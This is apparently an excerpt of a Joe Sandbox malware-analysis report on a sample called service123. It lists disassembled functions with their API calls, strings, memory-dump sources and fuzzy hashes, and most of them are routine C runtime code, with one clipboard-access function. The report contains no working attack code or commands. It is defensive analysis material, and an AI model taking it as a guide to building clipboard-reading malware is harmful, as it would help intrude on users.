API String ID: 384173800-1835852900
Opcode ID: 483f6b5961accb6416313e8a1be623d67c6a0b43da439b0b97bc4407a070d44e
Instruction ID: f13a55da448c8e6c165b2ed968166d2f2ad795f3422cde9cb0b9a4c5a02f83d8
Opcode Fuzzy Hash: 483f6b5961accb6416313e8a1be623d67c6a0b43da439b0b97bc4407a070d44e
Instruction Fuzzy Hash: 26015EB690A6049FDB00FFB99507A2DBFF4AA42294F018829D9C947B14D731C4248FA3

Function 000114E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 000114F0
LoadLibraryA.KERNEL32 ref: 00011506
GetProcAddress.KERNEL32 ref: 00011525
GetProcAddress.KERNEL32 ref: 00011537

Strings

__deregister_frame_info, xrefs: 0001152C
libgcc_s_dw2-1.dll, xrefs: 000114E9, 000114FF
__register_frame_info, xrefs: 0001151A

Memory Dump Source

Source File: 00000005.00000002.3307743651.0000000000011000.00000020.00000001.01000000.00000005.sdmp, Offset: 00010000, based on PE: true

Associated: 00000005.00000002.3307715899.0000000000010000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307770444.000000000001A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307796313.000000000001E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307816608.0000000000021000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000_service123.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: __deregister_frame_info$__register_frame_info$libgcc_s_dw2-1.dll
API String ID: 384173800-1835852900
Opcode ID: 0f606cc31e92f7f0f92b70ec9433ab0dec14e4c1fffa1239b7108b670c154191
Instruction ID: 239ababda91337f8480848274ddca86a5df6f2e2e82ac9e3291f5636134a872c
Opcode Fuzzy Hash: 0f606cc31e92f7f0f92b70ec9433ab0dec14e4c1fffa1239b7108b670c154191
Instruction Fuzzy Hash: 630121B19052409BD351BF79E9493DD7FF4AB49790F41852DE98987201E77884848BA3

Function 6C3673C0 Relevance: 12.2, APIs: 6, Strings: 2, Instructions: 237stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 6C367411
strlen.MSVCRT ref: 6C36742B
strlen.MSVCRT ref: 6C36747B
strlen.MSVCRT ref: 6C3674D8
strlen.MSVCRT ref: 6C36752C

Strings

*, xrefs: 6C367660
basic_string::append, xrefs: 6C3676CA, 6C3676D6, 6C3676E2, 6C3676EE

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: strlen$strcmp
String ID: *$basic_string::append
API String ID: 551667898-3732199748
Opcode ID: 0addc38db94c9500c24cafc53ded8d6dc126c9dffd37b5c9cda3ca20b22a0b1a
Instruction ID: c1fe0c1a37ca441b5c215122a2ef2c0830c857a4639bb69f1f16faa40b4ddf2b
Opcode Fuzzy Hash: 0addc38db94c9500c24cafc53ded8d6dc126c9dffd37b5c9cda3ca20b22a0b1a
Instruction Fuzzy Hash: 46A13BB06087118FD700EF29C184B6EBBE1BF45348F51896DD8949BB48D735E849CF92

Function 6C3E3DD0 Relevance: 12.2, APIs: 7, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 6C3E3E6F
memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C37E9CE), ref: 6C3E3ED3
memmove.MSVCRT ref: 6C3E3F0B
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C37E9CE), ref: 6C3E3F7A

Strings

basic_string::_M_replace, xrefs: 6C3E40FF

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: memmove$memcpy
String ID: basic_string::_M_replace
API String ID: 3033661859-2323331477
Opcode ID: 359836670dbd2e2b6421e955c107623090481897aedff39b9e454b9400aa6dbc
Instruction ID: ce2e71eb1a6e664121118a5682fbb18893569e6504179fd85c62f09668dfee3a
Opcode Fuzzy Hash: 359836670dbd2e2b6421e955c107623090481897aedff39b9e454b9400aa6dbc
Instruction Fuzzy Hash: 6A910375A093618FC300DF58C08096ABBF1BF8D348F54896EE5899B724E735E985CF92

Function 6C34E800 Relevance: 12.1, APIs: 8, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 1884a794d3d441725b09e7e72905d71cc32fb0140713b8c23ce069bb11cd822c
Instruction ID: 65d9687cd4aa7de38f94fdf1c57e9df657453ec7582ac6f99078f9c85a7493f7
Opcode Fuzzy Hash: 1884a794d3d441725b09e7e72905d71cc32fb0140713b8c23ce069bb11cd822c
Instruction Fuzzy Hash: 4521C2319583098FDF10CE29C48199AF7EAEB96718B54CA25D4D447E18D321E88B8FE2

Function 6C359BA6 Relevance: 12.1, APIs: 8, Instructions: 86clipboardCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 6C359BA9
IsClipboardFormatAvailable.USER32 ref: 6C359DDC
OpenClipboard.USER32 ref: 6C359DF0

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: Clipboard$AvailableCloseFormatHandleOpen
String ID:
API String ID: 518195572-0
Opcode ID: 24690ac373bb86eabba8a496c321d10776fbb342ce9bff84a6d8fdd3ae79b0b6
Instruction ID: 1958321060693de8b5522a9fd528d6506fcd11a017b3302519b950202af1ae61
Opcode Fuzzy Hash: 24690ac373bb86eabba8a496c321d10776fbb342ce9bff84a6d8fdd3ae79b0b6
Instruction Fuzzy Hash: EA215EB27082008FEB00BF79D5495BEBBF4AB49305F400A39D88683644EB76D459CF63

Function 00011E70 Relevance: 12.1, APIs: 8, Instructions: 84COMMON

Download Yara Rule

APIs

signal.MSVCRT ref: 00011EAF
signal.MSVCRT ref: 00011EF6
signal.MSVCRT ref: 00011F0F
signal.MSVCRT ref: 00011F36
signal.MSVCRT ref: 00011F72
signal.MSVCRT ref: 00011FBF
signal.MSVCRT ref: 00011FD5
signal.MSVCRT ref: 00011FEB

Memory Dump Source

Source File: 00000005.00000002.3307743651.0000000000011000.00000020.00000001.01000000.00000005.sdmp, Offset: 00010000, based on PE: true

Associated: 00000005.00000002.3307715899.0000000000010000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307770444.000000000001A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307796313.000000000001E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307816608.0000000000021000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000_service123.jbxd

Similarity

API ID: signal
String ID:
API String ID: 1946981877-0
Opcode ID: d170d116d76a76e9666f7d5f0cadc4b7ce49c6170d16eaa277a1c4f945399d1d
Instruction ID: 33416e26fd9009060e90bf10a497ed1105e7e37781e392849442666d051ee1c6
Opcode Fuzzy Hash: d170d116d76a76e9666f7d5f0cadc4b7ce49c6170d16eaa277a1c4f945399d1d
Instruction Fuzzy Hash: 5B3151709083048AE7A86FA4D9403EE76D4BF45358F158D2DEAC8C7282DB7DC9C99B53

Function 6C354A30 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 399COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 6C354A48

Strings

NaN, xrefs: 6C35540B
@, xrefs: 6C354D17
Inf, xrefs: 6C355505, 6C35551D

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: _errno
String ID: @$Inf$NaN
API String ID: 2918714741-141429178
Opcode ID: 580e811142150c0880c4eff8b2ad0b62b4b10289a27b8cd665ac76a3423f01a9
Instruction ID: f7a6c057bd3f560ea3dfe1e1ebd598194b4d12d1851b71b2a3e81d407439e5c7
Opcode Fuzzy Hash: 580e811142150c0880c4eff8b2ad0b62b4b10289a27b8cd665ac76a3423f01a9
Instruction Fuzzy Hash: FCF1BF7160C3858BD7258F24C440B9ABBE1ABC5318F958A1DE9DC8B781D73599268F82

Function 00014360 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 399COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00014378

Strings

Inf, xrefs: 00014E35, 00014E4D
NaN, xrefs: 00014D3B
@, xrefs: 00014647

Memory Dump Source

Source File: 00000005.00000002.3307743651.0000000000011000.00000020.00000001.01000000.00000005.sdmp, Offset: 00010000, based on PE: true

Associated: 00000005.00000002.3307715899.0000000000010000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307770444.000000000001A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307796313.000000000001E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307816608.0000000000021000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000_service123.jbxd

Similarity

API ID: _errno
String ID: @$Inf$NaN
API String ID: 2918714741-141429178
Opcode ID: e98a8bae463c98c9d63d0f20f5c38a6a1288430d0f5e7fec9435fc4213759247
Instruction ID: b02d87831d1ad5f2edef3d6bc0a28546ad4c20a5c9a6e81955d65a7bf0be7df0
Opcode Fuzzy Hash: e98a8bae463c98c9d63d0f20f5c38a6a1288430d0f5e7fec9435fc4213759247
Instruction Fuzzy Hash: 45F1C07560C3818BD7718F24C0903EBBBE2BF85314F158A1DE9DD873A2D73599868B82

Function 6C353830 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 295COMMON

Download Yara Rule

Strings

0, xrefs: 6C353B96
@, xrefs: 6C353AFA

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID:
String ID: 0$@
API String ID: 0-1545510068
Opcode ID: 852fd2e7f322feda59a9287ec6fcafc659018383277beee50283a5623e34e20d
Instruction ID: 2b1e0f58adc40a40c006d989ba2b9806a0d0813fbdd5a2ef72b6f8c02fd1d0a2
Opcode Fuzzy Hash: 852fd2e7f322feda59a9287ec6fcafc659018383277beee50283a5623e34e20d
Instruction Fuzzy Hash: E2C19DB5E042158BCB45CF6CC480B8DBBF5AF89318FA88259EC94AB785D335E855CF90

Function 00013160 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 295COMMON

Download Yara Rule

Strings

@, xrefs: 0001342A
0, xrefs: 000134C6

Memory Dump Source

Source File: 00000005.00000002.3307743651.0000000000011000.00000020.00000001.01000000.00000005.sdmp, Offset: 00010000, based on PE: true

Associated: 00000005.00000002.3307715899.0000000000010000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307770444.000000000001A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307796313.000000000001E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307816608.0000000000021000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000_service123.jbxd

Similarity

API ID:
String ID: 0$@
API String ID: 0-1545510068
Opcode ID: e57f9d77be607eb7be2d65c7f691f863806e0b74bc638be5844c6890f5152d77
Instruction ID: 0f91629db12188f476f972303b36b729e0b43ccf23438a1945f49f06cedf1712
Opcode Fuzzy Hash: e57f9d77be607eb7be2d65c7f691f863806e0b74bc638be5844c6890f5152d77
Instruction Fuzzy Hash: A5C16B71E002159BDB15CF6CC4847DDBBF1BF88314F198269E868AB385D734EA85CB94

Function 6C36B810 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 212stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C36B836
memcmp.MSVCRT ref: 6C36B85A
memcmp.MSVCRT ref: 6C36B8CD
memcmp.MSVCRT ref: 6C36B93F

Part of subcall function 6C40ADB0: strlen.MSVCRT ref: 6C40ADBE

memcmp.MSVCRT ref: 6C36B9D7

Strings

basic_string::compare, xrefs: 6C36B879, 6C36B8EA, 6C36B95D, 6C36B9F6, 6C36BA12
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C36B881, 6C36B8F2, 6C36B965, 6C36B9FE, 6C36BA1A

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: memcmp$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
API String ID: 3738950036-1697194757
Opcode ID: 3adf4a67d4b53942089d23bb89d887efabb8c4186667252a92069c0f08cf713c
Instruction ID: aa2363ab4bc7bcb94b11505da89baace1b6c391e3e0aa8e6746df6b349922e04
Opcode Fuzzy Hash: 3adf4a67d4b53942089d23bb89d887efabb8c4186667252a92069c0f08cf713c
Instruction Fuzzy Hash: 6C6145B56093119FC300DF29C98195AFBE5BF88648F55892DF8C887B14D271D884CF92

Function 6C367710 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 211stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C3B3320: memset.MSVCRT ref: 6C3B3365

strcmp.MSVCRT ref: 6C367771
strlen.MSVCRT ref: 6C36778C
strlen.MSVCRT ref: 6C3677D3
strlen.MSVCRT ref: 6C367844
strlen.MSVCRT ref: 6C3678B2

Strings

*, xrefs: 6C367990

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: strlen$memsetstrcmp
String ID: *
API String ID: 3639840916-163128923
Opcode ID: d7ff6a3f00020259a2b6e10db750329e0a0f91176c467c911fa5a23e85f7f2c1
Instruction ID: 813bb02def24391067e8ffed49fe52b883f81a57b4a9c45207032e67a89e071b
Opcode Fuzzy Hash: d7ff6a3f00020259a2b6e10db750329e0a0f91176c467c911fa5a23e85f7f2c1
Instruction Fuzzy Hash: 9B8116B5A056008FDB00EF29C488A5EFBF5FF86308F41856DD895ABB14D735A809CF92

Function 6C34E8E0 Relevance: 10.7, APIs: 7, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 6949fccd0a9c3e9d3ac8c5b45f2aac2a255c09ca815fc16772279bff97c29dd2
Instruction ID: 67f8f95df072635d3ef53dcbe6a75ed5699e0516e16fb17bea43f2607e2d35ae
Opcode Fuzzy Hash: 6949fccd0a9c3e9d3ac8c5b45f2aac2a255c09ca815fc16772279bff97c29dd2
Instruction Fuzzy Hash: 30516A715097048FD710CF19C080A9AF7E5BF8A308F448A5AE8E89BB91D335D94ACF96

Function 6C34E340 Relevance: 10.6, APIs: 7, Instructions: 126synchronizationCOMMON

Download Yara Rule

APIs

CreateSemaphoreW.KERNEL32 ref: 6C34E487
WaitForSingleObject.KERNEL32 ref: 6C34E4C8

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: CreateObjectSemaphoreSingleWait
String ID:
API String ID: 1168595426-0
Opcode ID: 07e2e2bcc8ff965945575f2b38cb7e3490cfb0c051a3711e88202c9a3bd2ee28
Instruction ID: 627956a79c7d8bfba70d76af1d0fcf6eac0b9720cf8176465bc8b24e91470604
Opcode Fuzzy Hash: 07e2e2bcc8ff965945575f2b38cb7e3490cfb0c051a3711e88202c9a3bd2ee28
Instruction Fuzzy Hash: 8A514C707093018FEB11EF3AC584726BBF6BB0671CF118928D89487B45D772E4458FA2

Function 6C3501F0 Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C350209
memcpy.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C35022D
malloc.MSVCRT ref: 6C350247
memset.MSVCRT ref: 6C350275
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D7E

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: abort$malloc$memcpymemset
String ID:
API String ID: 334492700-0
Opcode ID: e6d7780d917140ca2a5588e03258049156473324d9afcb76f04c1c6ed51653e4
Instruction ID: 45920ec5138ddc51e409b5dd6ed0407fee5591cb1c3f1055e93082a2fd41d693
Opcode Fuzzy Hash: e6d7780d917140ca2a5588e03258049156473324d9afcb76f04c1c6ed51653e4
Instruction Fuzzy Hash: 31114FB56097459ED700AF69D480C99B7E8EB4425CF85897DD88887B00E731D5198A62

Function 00018120 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0001812C
GetProcAddress.KERNEL32 ref: 0001814C
GetProcAddress.KERNEL32 ref: 0001818B

Strings

___lc_codepage_func, xrefs: 00018144
__lc_codepage, xrefs: 00018180
msvcrt.dll, xrefs: 00018125

Memory Dump Source

Source File: 00000005.00000002.3307743651.0000000000011000.00000020.00000001.01000000.00000005.sdmp, Offset: 00010000, based on PE: true

Associated: 00000005.00000002.3307715899.0000000000010000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307770444.000000000001A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307796313.000000000001E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307816608.0000000000021000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000_service123.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ___lc_codepage_func$__lc_codepage$msvcrt.dll
API String ID: 667068680-1145701848
Opcode ID: c27052c818e04af39a0090dc770cd766e871308035c612eac193fdcabefe33d2
Instruction ID: 7b8b77f65e37e8697d4c51971b5afce12629c1371a40acd862d0ce8973e5a27c
Opcode Fuzzy Hash: c27052c818e04af39a0090dc770cd766e871308035c612eac193fdcabefe33d2
Instruction Fuzzy Hash: C7F06DB19092109FAB50BF78AD042CB7AE4AB09350F45C53ADC85C7240EAB88585CBA3

Function 6C359171 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 6C35917C
GetProcAddress.KERNEL32 ref: 6C35919C
GetProcAddress.KERNEL32 ref: 6C3591DB

Strings

msvcrt.dll, xrefs: 6C359175
__lc_codepage, xrefs: 6C3591D0
___lc_codepage_func, xrefs: 6C359194

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ___lc_codepage_func$__lc_codepage$msvcrt.dll
API String ID: 667068680-1145701848
Opcode ID: ce2e12febb8d9e7893da2d6ee5c503013e376651b07d300086bda890e7b29206
Instruction ID: c76b614b4caf2254fb64be70f22b5150f0c48f38e70e845f17c459341279c500
Opcode Fuzzy Hash: ce2e12febb8d9e7893da2d6ee5c503013e376651b07d300086bda890e7b29206
Instruction Fuzzy Hash: E9F062F19453118FAB00FF7C590BA5ABFF4A605254F810539C989C7604E675C521CFE2

Function 6C34EA9B Relevance: 10.5, APIs: 7, Instructions: 21COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D60
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D65
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D6A
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D7E

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
